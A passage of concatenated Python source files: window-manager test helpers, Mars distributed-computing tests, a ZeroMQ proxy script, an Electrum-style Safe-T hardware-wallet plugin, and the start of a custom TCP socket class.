self.proc = None
for proc in self.testwindows[:]:
proc.terminate()
proc.wait()
self.testwindows.remove(proc)
def create_window(self, create, failed=None):
"""
Uses the function `create` to create a window.
Waits until qtile actually maps the window and then returns.
"""
client = self.c
start = len(client.windows())
create()
@Retry(ignore_exceptions=(RuntimeError,), fail_msg="Window never appeared...")
def success():
while failed is None or not failed():
if len(client.windows()) > start:
return True
raise RuntimeError("not here yet")
return success()
def _spawn_window(self, *args):
"""Starts a program which opens a window
Spawns a new subprocess for a command that opens a window, given by the
arguments to this method. Spawns the new process and checks that qtile
maps the new window.
"""
if not args:
raise AssertionError("Trying to run nothing! (missing arguments)")
proc = None
def spawn():
nonlocal proc
# Ensure the client only uses the test display
env = os.environ.copy()
env.pop("DISPLAY", None)
env.pop("WAYLAND_DISPLAY", None)
env.update(self.backend.env)
proc = subprocess.Popen(args, env=env)
def failed():
if proc.poll() is not None:
return True
return False
self.create_window(spawn, failed=failed)
self.testwindows.append(proc)
return proc
def kill_window(self, proc):
"""Kill a window and check that qtile unmaps it
Kills a window created by calling one of the `self.test*` methods,
ensuring that qtile removes it from the `windows` attribute.
"""
assert proc in self.testwindows, "Given process is not a spawned window"
start = len(self.c.windows())
proc.terminate()
proc.wait()
self.testwindows.remove(proc)
@Retry(ignore_exceptions=(ValueError,))
def success():
if len(self.c.windows()) < start:
return True
raise ValueError("window is still in client list!")
if not success():
raise AssertionError("Window could not be killed...")
def test_window(self, name, floating=False, wm_type="normal", export_sni=False):
"""
Create a simple window in X or Wayland. If `floating` is True then the wmclass
is set to "dialog", which triggers auto-floating based on `default_float_rules`.
`wm_type` can be changed from "normal" to "notification", which creates a window
that not only floats but does not grab focus.
Setting `export_sni` to True will publish a simplified StatusNotifierItem interface
on DBus.
Windows created with this method must have their process killed explicitly, no
matter what type they are.
"""
python = sys.executable
path = Path(__file__).parent / "scripts" / "window.py"
wmclass = "dialog" if floating else "TestWindow"
args = [python, path, "--name", wmclass, name, wm_type]
if export_sni:
args.append("export_sni_interface")
return self._spawn_window(*args)
def test_notification(self, name="notification"):
return self.test_window(name, wm_type="notification")
def groupconsistency(self):
groups = self.c.groups()
screens = self.c.screens()
seen = set()
for g in groups.values():
scrn = g["screen"]
if scrn is not None:
if scrn in seen:
raise AssertionError("Screen referenced from more than one group.")
seen.add(scrn)
assert screens[scrn]["group"] == g["name"]
assert len(seen) == len(screens), "Not all screens had an attached group."
@Retry(ignore_exceptions=(AssertionError,), fail_msg="Window did not die!")
def assert_window_died(client, window_info):
client.sync()
wid = window_info["id"]
assert wid not in set([x["id"] for x in client.windows()])
|
test_local.py
|
# Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import os
import threading
import tempfile
import time
import uuid
import numpy as np
import pandas as pd
import pytest
try:
import vineyard
except ImportError:
vineyard = None
import mars.dataframe as md
import mars.tensor as mt
import mars.remote as mr
from mars.config import option_context
from mars.deploy.oscar.session import get_default_async_session, \
get_default_session, new_session, execute, fetch, stop_server, \
AsyncSession, _IsolatedWebSession
from mars.deploy.oscar.local import new_cluster
from mars.deploy.oscar.service import load_config
from mars.lib.aio import new_isolation
from mars.storage import StorageLevel
from mars.services.storage import StorageAPI
from mars.tensor.arithmetic.add import TensorAdd
from .modules.utils import ( # noqa: F401; pylint: disable=unused-variable
cleanup_third_party_modules_output,
get_output_filenames,
)
CONFIG_TEST_FILE = os.path.join(
os.path.dirname(__file__), 'local_test_config.yml')
CONFIG_VINEYARD_TEST_FILE = os.path.join(
os.path.dirname(__file__), 'local_test_with_vineyard_config.yml')
CONFIG_THIRD_PARTY_MODULES_TEST_FILE = os.path.join(
os.path.dirname(__file__), 'local_test_with_third_parity_modules_config.yml')
params = ['default']
if vineyard is not None:
params.append('vineyard')
@pytest.mark.parametrize(indirect=True)
@pytest.fixture(params=params)
async def create_cluster(request):
if request.param == 'default':
config = CONFIG_TEST_FILE
elif request.param == 'vineyard':
config = CONFIG_VINEYARD_TEST_FILE
start_method = os.environ.get('POOL_START_METHOD', None)
client = await new_cluster(subprocess_start_method=start_method,
config=config,
n_worker=2,
n_cpu=2,
use_uvloop=False)
async with client:
if request.param == 'default':
assert client.session.client is not None
yield client
def _assert_storage_cleaned(session_id: str,
addr: str,
level: StorageLevel):
async def _assert(session_id: str,
addr: str,
level: StorageLevel):
storage_api = await StorageAPI.create(session_id, addr)
assert len(await storage_api.list(level)) == 0
info = await storage_api.get_storage_level_info(level)
assert info.used_size == 0
isolation = new_isolation()
asyncio.run_coroutine_threadsafe(
_assert(session_id, addr, level), isolation.loop).result()
@pytest.mark.asyncio
async def test_execute(create_cluster):
session = get_default_async_session()
assert session.address is not None
assert session.session_id is not None
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
info = await session.execute(b)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
np.testing.assert_equal(raw + 1, await session.fetch(b))
with pytest.raises(ValueError):
await session.fetch(b + 1)
with pytest.raises(ValueError):
await session.fetch(b[b < 0.6])
del a, b
@pytest.mark.asyncio
async def test_iterative_tiling(create_cluster):
session = get_default_async_session()
raw = np.random.RandomState(0).rand(30, 5)
raw_df = pd.DataFrame(raw, index=np.arange(1, 31))
df = md.DataFrame(raw_df, chunk_size=10)
df = df[df[0] < .7]
df2 = df.shift(2)
info = await session.execute(df2)
await info
assert info.result() is None
result = await session.fetch(df2)
expected = raw_df[raw_df[0] < .7].shift(2)
pd.testing.assert_frame_equal(result, expected)
# test meta
assert df2.index_value.min_val >= 1
assert df2.index_value.max_val <= 30
@pytest.mark.asyncio
async def test_execute_describe(create_cluster):
s = np.random.RandomState(0)
raw = pd.DataFrame(s.rand(100, 4), columns=list('abcd'))
df = md.DataFrame(raw, chunk_size=30)
session = get_default_async_session()
r = df.describe()
info = await session.execute(r)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
res = await session.fetch(r)
pd.testing.assert_frame_equal(res, raw.describe())
@pytest.mark.asyncio
async def test_sync_execute_in_async(create_cluster):
a = mt.ones((10, 10))
b = a + 1
res = b.to_numpy()
np.testing.assert_array_equal(res, np.ones((10, 10)) + 1)
def _my_func():
print('output from function')
async def _run_web_session_test(web_address):
session_id = str(uuid.uuid4())
session = await AsyncSession.init(web_address, session_id)
session.as_default()
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
info = await session.execute(b)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
np.testing.assert_equal(raw + 1, await session.fetch(b))
del a, b
r = mr.spawn(_my_func)
info = await session.execute(r)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
assert 'output from function' in str(r.fetch_log(session=session))
assert 'output from function' in str(r.fetch_log(session=session,
offsets='0k',
sizes=[1000]))
assert 'output from function' in str(r.fetch_log(session=session,
offsets={r.op.key: '0k'},
sizes=[1000]))
AsyncSession.reset_default()
await session.destroy()
@pytest.mark.asyncio
async def test_web_session(create_cluster):
session_id = str(uuid.uuid4())
web_address = create_cluster.web_address
session = await AsyncSession.init(web_address, session_id)
assert await session.get_web_endpoint() == web_address
session.as_default()
assert isinstance(session._isolated_session, _IsolatedWebSession)
await test_execute(create_cluster)
await test_iterative_tiling(create_cluster)
AsyncSession.reset_default()
await session.destroy()
await _run_web_session_test(web_address)
def test_sync_execute():
session = new_session(n_cpu=2, web=False, use_uvloop=False)
# web not started
assert session._session.client.web_address is None
assert session.get_web_endpoint() is None
with session:
raw = np.random.RandomState(0).rand(10, 5)
a = mt.tensor(raw, chunk_size=5).sum(axis=1)
b = a.execute(show_progress=False)
assert b is a
result = a.fetch()
np.testing.assert_array_equal(result, raw.sum(axis=1))
c = b + 1
c.execute(show_progress=False)
result = c.fetch()
np.testing.assert_array_equal(result, raw.sum(axis=1) + 1)
c = mt.tensor(raw, chunk_size=5).sum()
d = session.execute(c)
assert d is c
assert abs(session.fetch(d) - raw.sum()) < 0.001
with tempfile.TemporaryDirectory() as tempdir:
file_path = os.path.join(tempdir, 'test.csv')
pdf = pd.DataFrame(np.random.RandomState(0).rand(100, 10),
columns=[f'col{i}' for i in range(10)])
pdf.to_csv(file_path, index=False)
df = md.read_csv(file_path, chunk_bytes=os.stat(file_path).st_size / 5)
result = df.sum(axis=1).execute().fetch()
expected = pd.read_csv(file_path).sum(axis=1)
pd.testing.assert_series_equal(result, expected)
df = md.read_csv(file_path, chunk_bytes=os.stat(file_path).st_size / 5)
result = df.head(10).execute().fetch()
expected = pd.read_csv(file_path).head(10)
pd.testing.assert_frame_equal(result, expected)
for worker_pool in session._session.client._cluster._worker_pools:
_assert_storage_cleaned(session.session_id, worker_pool.external_address,
StorageLevel.MEMORY)
session.stop_server()
assert get_default_async_session() is None
def test_no_default_session():
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
with pytest.warns(Warning):
execute(b, show_progress=False)
np.testing.assert_array_equal(fetch(b), raw + 1)
assert get_default_async_session() is not None
stop_server()
assert get_default_async_session() is None
@pytest.fixture
def setup_session():
session = new_session(n_cpu=2, use_uvloop=False)
assert session.get_web_endpoint() is not None
with session:
with option_context({'show_progress': False}):
yield session
session.stop_server()
def test_decref(setup_session):
session = setup_session
a = mt.ones((10, 10))
b = mt.ones((10, 10))
c = b + 1
d = mt.ones((5, 5))
a.execute()
b.execute()
c.execute()
d.execute()
del a
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 3
del b
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 3
del c
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 1
del d
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
rs = np.random.RandomState(0)
pdf = pd.DataFrame({
'a': rs.randint(10, size=10),
'b': rs.rand(10)
})
df = md.DataFrame(pdf, chunk_size=5)
df2 = df.groupby('a').agg('mean', method='shuffle')
result = df2.execute().fetch()
expected = pdf.groupby('a').agg('mean')
pd.testing.assert_frame_equal(result, expected)
del df, df2
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
worker_addr = session._session.client._cluster._worker_pools[0].external_address
_assert_storage_cleaned(session.session_id, worker_addr, StorageLevel.MEMORY)
def _cancel_when_execute(session, cancelled):
def run():
time.sleep(200)
rs = [mr.spawn(run) for _ in range(10)]
execute(*rs, cancelled=cancelled)
assert all(not r._executed_sessions for r in rs)
del rs
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
worker_addr = session._session.client._cluster._worker_pools[0].external_address
_assert_storage_cleaned(session.session_id, worker_addr, StorageLevel.MEMORY)
class SlowTileAdd(TensorAdd):
@classmethod
def tile(cls, op):
time.sleep(2)
return (yield from TensorAdd.tile(op))
def _cancel_when_tile(session, cancelled):
a = mt.tensor([1, 2, 3])
for i in range(20):
a = SlowTileAdd(dtype=np.dtype(np.int64))(a, 1)
execute(a, cancelled=cancelled)
assert not a._executed_sessions
del a
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
@pytest.mark.parametrize(
'test_func', [_cancel_when_execute, _cancel_when_tile])
def test_cancel(setup_session, test_func):
session = setup_session
async def _new_cancel_event():
return asyncio.Event()
isolation = new_isolation()
cancelled = asyncio.run_coroutine_threadsafe(
_new_cancel_event(), isolation.loop).result()
def cancel():
time.sleep(.5)
cancelled.set()
t = threading.Thread(target=cancel)
t.daemon = True
t.start()
start = time.time()
test_func(session, cancelled)
assert time.time() - start < 20
# submit another task
raw = np.random.rand(10, 10)
t = mt.tensor(raw, chunk_size=(10, 5))
np.testing.assert_array_equal(t.execute().fetch(), raw)
def test_load_third_party_modules(cleanup_third_party_modules_output): # noqa: F811
config = load_config()
config['third_party_modules'] = set()
with pytest.raises(TypeError, match='set'):
new_session(n_cpu=2, web=False, config=config)
config['third_party_modules'] = {'supervisor': ['not_exists_for_supervisor']}
with pytest.raises(ModuleNotFoundError, match='not_exists_for_supervisor'):
new_session(n_cpu=2, web=False, config=config)
config['third_party_modules'] = {'worker': ['not_exists_for_worker']}
with pytest.raises(ModuleNotFoundError, match='not_exists_for_worker'):
new_session(n_cpu=2, web=False, config=config)
config['third_party_modules'] = ['mars.deploy.oscar.tests.modules.replace_op']
session = new_session(n_cpu=2, web=False, config=config)
# web not started
assert session._session.client.web_address is None
with session:
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
b.execute(show_progress=False)
result = b.fetch()
np.testing.assert_equal(raw - 1, result)
session.stop_server()
assert get_default_session() is None
session = new_session(n_cpu=2, web=False,
config=CONFIG_THIRD_PARTY_MODULES_TEST_FILE)
# web not started
assert session._session.client.web_address is None
with session:
# 1 supervisor, 1 worker main pool, 2 worker sub pools.
assert len(get_output_filenames()) == 4
session.stop_server()
assert get_default_session() is None
|
zmqRouter.py
|
import zmq
from threading import Thread
import json
import argparse
import os
from zmqtest.asyncsrv import tprint
CONFIG_ERROR="Config file error. "
def generateDefaultConfig(configPath):
"""
如果没有router.json的配置文件的话就生成默认zmq代理模块的配置
:param configPath:
:return:
"""
routerConfig = {}
routerConfig["front_addr"] = "tcp://*:5559"
routerConfig["back_addr"] = "tcp://*:5560"
config ={}
config["routerParams"] = routerConfig
try:
with open(configPath,'w')as f:
f.write(json.dumps(config))
except IOError:
return False
return True
def create_router(front_addr,back_addr):
context = zmq.Context()
frontEnd = context.socket(zmq.ROUTER)
backEnd = context.socket(zmq.DEALER)
frontEnd.bind(front_addr)
backEnd.bind(back_addr)
print("zmq.proxy started ")
zmq.proxy(frontEnd,backEnd)
# We never get here...
frontEnd.close()
backEnd.close()
context.term()
def main_router():
print("Current libzmq version is %s" % zmq.zmq_version())
print("Current pyzmq version is %s" % zmq.pyzmq_version())
parser = argparse.ArgumentParser()
parser.add_argument("--configPath",type=str,default = "router.json")
args = parser.parse_args()
front_addr = ""
back_addr = ""
if os.path.exists(args.configPath) == False:
if(generateDefaultConfig(args.configPath) == False):
print("Generate default config file failed.")
front_addr = "tcp://*:5559"
back_addr = "tcp://*:5560"
print("Using default config parameters.")
else:
try:
with open(args.configPath,'r')as f:
config = json.loads(f.read())
if "routerParams" in config:
if "front_addr" in config["routerParams"]:
front_addr = config["routerParams"]["front_addr"]
else:
tprint(CONFIG_ERROR + "Missing front_addr")
if "back_addr" in config["routerParams"]:
back_addr = config["routerParams"]["back_addr"]
else:
tprint(CONFIG_ERROR + "Missing back_addr.")
else:
tprint(CONFIG_ERROR + "Missing routerParams.")
except IOError:
print("File is not accessible.")
print("front_addr : ",front_addr)
print("back_addr : ",back_addr)
broker_verifier = Thread(target=create_router, args=(front_addr, back_addr))
broker_verifier.start()
# auto broker_verifier = std::make_shared < std::thread > (create_router, front_addr, back_addr);
# if(broker_verifier){
# broker_verifier->join();
# }
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum.keystore import Hardware_KeyStore
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
from .client import SafeTClient
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
plugin: 'SafeTPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['SafeTClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitgesell"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_safet_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'SafeTKeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_safet_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype._extend_address_n(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'SafeTKeyStore'):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for out in tx.outputs():
o = t._add_bin_outputs()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
TCPsocket.py
|
AF_INET = 2
SOCK_STREAM = 1
RECEIVED_BUFFER_SIZE = 1048576 # todo discuss the buffer size, currently 1GMb
import os
import random
import threading
import time
from pprint import pprint
import IP
from Exceptions import *
from TCP import *
buffer_list = {
'listening': {}, # when server is listening, the key of the dict inside is the port of server.
'connected': {
'objects': {}
# objcts is a dict that stores every connected tcpSocket object as its value while their remote_address is the key
}, # when sockey (client or user) is connected, the key of the dict inside is the address of remote address
'connecting': {}, # when client is connecting, put self here, the remote address is key, list is value
}
port_list = []
local_ip = None
class TCPsocket():
# status
CLOSED = 0
LISTEN = 1
SYN_RCVD = 2
ESTABLISHED = 3
CLOSE_WAIT = 4
LAST_ACK = 5
SYN_SENT = 6
FIN_WAIT_1 = 7
FIN_WAIT_2 = 8
TIME_WAIT = 9
# const
TIME_INTERVAL = 100
def __init__(self, local_address, remote_address=None, server_isn=None, client_isn=None, sample_RTT = None):
self.__sent_but_not_acked = [] # a list of tuple, in the order of sending order. Each tuple contain a wanting ack number and data(NOT TCP OBJECT)
self.__sample_RTT_to_record = {} # a dict, the key of which is the wanting ack number, the value of which is the start_time (or None, indicating this message won’t count to sample_RTT).
self.__sample_RTT = sample_RTT # double
self.__estimated_RTT = sample_RTT # double
self.__dev_RTT = 0 # double
self.__window_buffer = [] # a list of tuples, a tuple is in the format of (sequence_number, data)
self.__received_buffer = b'' # bytes, used to store complete infomation, which is also in order.
self.__ack_to_be_sent = []
self.__window_size = 5000
self.__segment_size = 500
